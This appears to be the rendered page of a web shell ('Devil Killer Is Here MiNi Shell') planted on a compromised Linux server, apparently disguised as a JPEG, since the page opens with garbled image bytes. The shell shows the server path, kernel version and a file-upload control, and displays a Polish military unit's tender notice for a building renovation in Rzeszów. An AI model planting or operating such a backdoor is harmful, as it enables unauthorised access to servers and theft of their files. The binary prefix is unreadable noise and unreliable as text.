JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250806/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250806/0036412801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont budynku nr 5 w kompleksie wojskowym przy ul. Krakowskiej 11b w Rzeszowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">34 Wojskowy Oddział Gospodarczy w Rzeszowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180690373</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krakowska 11B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-111</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261155659</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia34wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.34wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont budynku nr 5 w kompleksie wojskowym przy ul. Krakowskiej 11b w Rzeszowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-056f7f06-9e9e-4598-b64b-4dacd45335ed</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00364128</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00147315/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont budynku nr 5 w kompleksie wojskowym przy ul. Krakowskiej 11B w Rzeszowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1155591 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> 1.	Zamawiający informuje, iż w zakresie przedmiotowego zamówienia występują dokumenty o klauzuli „ZASTRZEŻONE” stanowiące integralną część dokumentów zamówienia (branża teletechniczna). W związku z powyższym dokumenty te nie są udostępnione na stronie internetowej prowadzonego postępowania. Tym samym zgodnie z art. 131 ust. 2 ustawy Pzp Zamawiający wymaga złożenia oferty po odbyciu przez Wykonawców obligatoryjnej wizji lokalnej oraz po obligatoryjnym sprawdzeniu dokumentów niezbędnych do realizacji niniejszego zamówienia.<br/>2.	Odbycie wizji lokalnej oraz sprawdzenie dokumentów przez Wykonawców jest warunkiem obligatoryjnym umożliwiającym wzięcie udziału w postępowaniu. Oznacza to, iż zgodnie z art. 226 ust. 1 pkt 18) ustawy Pzp Zamawiający odrzuci ofertę, która została złożona bez odbycia wizji lokalnej oraz sprawdzenia dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego.<br/>3.	Termin i miejsce przeprowadzenia wizji lokalnej oraz sprawdzenia dokumentów:<br/>1)	14.08.2025r., o godz. 10:00 w Rzeszowie, przy ul. Krakowska 11B, <br/>	po wcześniejszym kontakcie z osobami uprawnionymi do udzielenia informacji, tj: p. Andrzej BAŃKO tel. 261-156-325, p. Robert SZEWCZYK tel. 261-156-979, p. Mateusz DOBRZYŃSKI tel. 261-156-980.<br/>4.	Informacje dotyczące zasad i przebiegu wizji lokalnej oraz sprawdzenia dokumentów: <br/>1)	Koszty wizji lokalnej oraz koszty procedury sprawdzenia dokumentów ponosi samodzielnie Wykonawca.<br/>2)	Zamawiający zapewni przedstawicielom Wykonawcy wejście na teren, gdzie wykonywany ma być przedmiot zamówienia, z tym, że Wykonawca ponosi wszelką odpowiedzialność w odniesieniu do takiej wizyty, w szczególności konsekwencje śmierci lub zranienia, strat lub szkód majątkowych oraz wszelkich innych strat, szkód i wydatków poniesionych jako następstwo takiej wizji.<br/>3)	Podczas wizji lokalnej oraz procedury związanej ze sprawdzeniem dokumentów nie będą udzielane przez przedstawicieli Zamawiającego odpowiedzi na pytania dotyczące przedmiotu zamówienia lub SWZ. Pytania takie należy kierować za pośrednictwem formularza „Wyślij wiadomość” dostępnego na dole strony internetowej postępowania zamieszczonego na platformie: https://platformazakupowa.pl/transakcja/1155591 lub za pomocą poczty elektronicznej e-mail: zamowienia34wog@ron.mil.pl.<br/>5.	W procedurze sprawdzania przez Wykonawców dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego (dot. branży teletechnicznej) mogą brać udział uprawnieni przedstawiciele Wykonawcy, którzy przedstawią Zamawiającemu:<br/>1)	imienne poświadczenie bezpieczeństwa o klauzuli co najmniej „ZASTRZEŻONE” wraz z aktualnym pisemnym zaświadczeniem stwierdzającym odbycie przeszkolenia w zakresie ochrony informacji niejawnych; <br/>2)	odpis z Krajowego Rejestru Sądowego (KRS) lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG), z którego wynika, że przedstawiciele Wykonawcy są upoważnieni do reprezentowania firmy, a w przypadku gdy Wykonawcę reprezentuje pełnomocnik należy przedstawić pełnomocnictwo do reprezentowania firmy;<br/>3)	dowód osobisty na potwierdzenie tożsamości osoby biorącej udział w wizji lokalnej oraz sprawdzeniu niezbędnej dokumentacji.<br/>6.	W przypadku wizji lokalnej wymagania, o których mowa w ust. 5 pkt 1) nie będą wymagane.<br/>7.	Z odbytej wizji lokalnej oraz procedury sprawdzenia przez Wykonawcę dokumentów zostanie sporządzony, w dwóch egzemplarzach, protokół (wzór stanowi załącznik nr 15 do SWZ), który Wykonawca ma obowiązek dołączyć do składanej oferty. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1155591</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej.<br/>2. W korespondencji kierowanej do Zamawiającego za pomocą poczty elektronicznej Wykonawca winien posługiwać się nazwą i<br/>numerem postępowania.<br/>3. Ofertę wraz z załącznikami wymaganymi do oferty należy złożyć w oryginale w formie elektronicznej opatrzoną kwalifikowanym<br/>podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub osobistym – za pośrednictwem<br/>https://platformazakupowa.pl/transakcja/1140268.<br/>4. Składanie przez Wykonawców:<br/>a) wniosków o wyjaśnienie treści SWZ;<br/>b) przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>c) przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia oświadczenia, o którym mowa w art.<br/>125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>d) przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w<br/>art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w<br/>postępowaniu;<br/>e) przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>f) przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>g) przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>h) przesyłania odwołania/inne;<br/>– odbywa się za pośrednictwem Platformy Zakupowej Zamawiającego i formularza „Wyślij wiadomość do zamawiającego”.<br/>5.Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego”.<br/>6.Uwaga! Wykonawca niezalogowany korzystający z “Wyślij wiadomość do zamawiającego”, po kliknięciu przycisku Wyślij, otrzyma<br/>na adres mailowy, podany w polu Twój adres e-mail, wiadomość mailową zawierającą kod uwierzytelniający. Kod należy wpisać w<br/>polu Kod Uwierzytelniający, a następnie potwierdzić przyciskiem Wyślij.<br/>7. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>8. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r.w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>f) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3;<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>15. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: musi zapoznać się z instrukcją<br/>dostępną na stronie internetowej: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	W związku z wprowadzeniem do krajowego porządku prawnego postanowień Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanego dalej RODO, a także ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych informuje się, iż na stronie internetowej Zamawiającego pod adresem: https://34wog.wp.mil.pl/pozostae-2017-01-16-v/ochrona-danych-osobowych-2018-10-01-f/klauzule-informacyjne-2019-07-31-q/ zawarto stosowną klauzulę informacyjną dla osób fizycznych przystępujących i biorących udział w postępowaniu o udzielenie zamówienia publicznego. <br/>2.	Wykonawcy ubiegający się o udzielenie zamówienia powinni zapoznać się treścią przedmiotowej klauzuli jak również respektować zawarte w niej postanowienia i zasady.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/72/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Remont budynku nr 5 w kompleksie wojskowym przy ul. Krakowskiej 11b w Rzeszowie.<br/>2.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w:<br/>1)	Opisie Przedmiotu Zamówienia – Załącznik nr 5 do SWZ;<br/>2)	STWiORB-ach – Załącznik nr 6 do SWZ;<br/>3)	Przedmiarach inwestorskim – Załącznik nr 7 do SWZ;<br/>4)	Projektach – Załącznik nr 8 do SWZ;<br/>5)	Inwentaryzacji Architektoniczno-Budowlanej – Załącznik nr 9 do SWZ;<br/>6)	Schematach elektrycznych – Załącznik nr 16 do SWZ.<br/>3.	Integralną częścią Opisu przedmiotu zamówienia stanowią projektowane postanowienia umowy wraz z załącznikami (załącznik nr 4 do SWZ).<br/>4.	Wykonawca ponosi pełną odpowiedzialność za teren budowy z chwilą jego przejęcia.<br/>5.	Zamawiający, stosownie do art. 95 ustawy Prawo zamówień publicznych, wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących, przez cały okres ich trwania, robót budowlanych w zakresie:<br/>1)	prac budowlanych;<br/>2)	prac instalacyjnych c.o. i spr. powietrze;<br/>3)	prac instalacyjnych wentylacji i klimatyzacji;<br/>4)	prac instalacyjnych wodno-kanalizacyjnych;<br/>5)	prac elektrycznych;<br/>6)	prac teletechnicznych;<br/>6.	W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełnienia przez niego lub przez podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących czynności wskazane powyżej. Szczegółowe czynności kontrolne opisane są w §1 ust. 8-10 projektowanych postanowieniach umowy (załącznik nr 4 do SWZ).<br/>7.	Zamawiający nie określa wymagań związanych z zatrudnianiem osób, o których mowa <br/>w art. 96 ust. 2 pkt 2 Pzp.<br/>1.	Płatność odbędzie się w trzech (3) częściach, zgodnie z uzgodnionym z Zamawiającym harmonogramem rzeczowo-finansowym realizacji robót:<br/>a)	Część I - faktura za I etap przedmiotu umowy do wysokości limitu na 2025 r., wystawiona na podstawie protokołu odbioru tego etapu przedmiotu umowy, potwierdzającego wykonanie robót budowlanych wchodzących w jego skład zgodnie harmonogramem rzeczowo-finansowym, potwierdzającym wykonanie przedmiotu umowy zgodnie z:<br/>	dokumentacja projektową,<br/>	opisem przedmiotu zamówienia,<br/>	STWiORB,<br/>	SWZ,<br/>	przedmiarami robót,<br/>	ofertą Wykonawcy oraz obowiązującymi przepisami,<br/>b)	Część II - faktura za pierwszą fazę II etapu przedmiotu umowy w wysokości 50 % limitu na 2026 r., wystawiona na podstawie protokołu odbioru tej fazy II etapu przedmiotu umowy, potwierdzającego wykonanie robót budowlanych wchodzących w jego skład zgodnie harmonogramem rzeczowo-finansowym, potwierdzającym wykonanie przedmiotu umowy zgodnie z:<br/>	dokumentacja projektową,<br/>	opisem przedmiotu zamówienia,<br/>	STWiORB,<br/>	SWZ,<br/>	przedmiarami robót,<br/>	ofertą Wykonawcy oraz obowiązującymi przepisami,<br/>c)	Część III - faktura za drugą fazę II etapu przedmiotu umowy w wysokości pozostałych 50 % limitu na 2026 r., wystawiona na podstawie protokołu odbioru tej fazy II etapu przedmiotu umowy (protokół odbioru końcowego), potwierdzającego wykonanie robót budowlanych wchodzących w jego skład zgodnie harmonogramem rzeczowo-finansowym, potwierdzającym wykonanie przedmiotu umowy zgodnie z:<br/>	dokumentacja projektową,<br/>	opisem przedmiotu zamówienia,<br/>	STWiORB,<br/>	SWZ,<br/>	przedmiarami robót,<br/>	ofertą Wykonawcy oraz obowiązującymi przepisami.<br/>Każdy protokół musi być potwierdzony przez komisję odbioru i Inspektora Nadzoru. Faktury za I, II i III część będą płatne w terminie do 30 dni od daty dostarczenia Zamawiającemu prawidłowo wystawionej faktury. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nieodrzuconych wyłącznie na podstawie kryterium oceny ofert, którymi są: <br/>1)	Cena Co (w rozumieniu łączna wartość brutto zamówienia) – waga 80 pkt, gdzie punkty wyliczane są wg następującego wzoru:<br/> · 80 pkt<br/>Co – liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium „Cena 80 pkt”<br/>CMIN – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu<br/> CB – zaproponowana cena oferty badanej<br/><br/>2)	Okres gwarancji i rękojmi Go – waga 20 pkt, gdzie punkty wyliczane są wg następującej tabeli oraz wzoru:<br/><br/>Gwarancja i rękojmia	Liczba przyznanych punktów<br/>do 36 miesięcy	0 pkt<br/>do 48 miesięcy	10 pkt<br/>do 60 miesięcy i dłużej	20 pkt<br/><br/>Go – liczba punktów uzyskanych przez ofertę badaną (po zaokrągleniu do dwóch miejsc po przecinku) w kryterium „Okres gwarancji i rękojmi” – 20 pkt”<br/><br/>UWAGA I: <br/>W sytuacji, gdy Wykonawca nie zaproponuje żadnego okresu gwarancji i rękojmi Zamawiający potraktuje taką ofertę jak z zaoferowaniem 36 miesięcy okresu i przyzna 0 pkt.<br/>UWAGA II:<br/>Oferta Wykonawcy, który zaproponuje kilka terminów – podlegać będzie odrzuceniu.<br/>UWAGA III:<br/>Oferta Wykonawcy, który zaproponuje terminy gwarancji i rękojmi niezgodne z powyższymi zapisami, tj. 32, 37, 39, 44, 49, 55 miesięcy i analogicznie – podlegać będzie odrzuceniu. <br/><br/><br/>2.	Liczba punktów uzyskana przez daną ofertę będzie wyliczona wg wzoru: <br/>P = C0 + G0<br/>3.	Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>4.	Zamówienie udzielone zostanie temu Wykonawcy, który:<br/>1)	spełni wymagania określone w niniejszej SWZ oraz ustawie Pzp;<br/>2)	przedłoży ofertę, która uzyska największą liczbę punktów wyliczonych zgodnie z algorytmem wskazanym przez Zamawiającego.<br/>5.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. <br/>6.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem. <br/>7.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy 